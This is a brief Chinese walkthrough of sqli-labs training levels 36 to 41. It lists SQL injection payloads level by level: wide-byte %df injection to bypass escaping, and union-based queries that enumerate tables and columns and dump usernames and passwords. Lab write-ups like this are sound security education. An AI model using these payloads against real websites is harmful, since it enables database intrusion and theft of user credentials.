sqli-labs靶场less36-less40

less36

1.我们打开靶场之后打开来看一下，输入的内容会被转义，依旧是宽字节注入

2.使用以下宽字节注入，使用的是%df

?id=-1%df%27%20union%20select%201,database(),3--+

3.剩余内容与前面关卡基本一样，只要使用上面的方法合成宽字节即可

less37

1.我们打开靶场之后打开来看一下，它依旧告诉我们输入的内容会被转义，且有登录框

2.我们可以看到需要进行抓包，然后就可以在数据包里面输入以下语句，我们依旧使用%df进行转义

?id=-1%df%27%20union%20select%201,database(),3--+

3.剩余的内容与之前一样，做法与上面相同

less38

1.我们打开靶场之后打开来看一下

2.这一关我们可以使用联和注入来做，语句如下

?id=-1' union select 1,2,3--+
?id=-1' union select 1,2,database()--+
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
?id=-1' union select 1,2,group_concat(username,password) from users--+

less39

1.我们打开靶场之后打开来看一下

2.我们可以继续使用联合注入来做，不过闭合方式为数字型的，语句如下

?id=-1 union select 1,2,3--+

3.方法和上面一样，语句与上一关基本一样

less40

1.我们打开靶场之后打开来看一下

2.这一关和上一关一样，不过是字符型，闭合方式为‘），语句如下

?id=1')union select 1,2,3--+

3.其余内容除闭合方式外和上一关一样

less41

1.这一关和39关一样为数字型注入

?id=-1 union select 1,2,3--+

2.其余做法和39关一样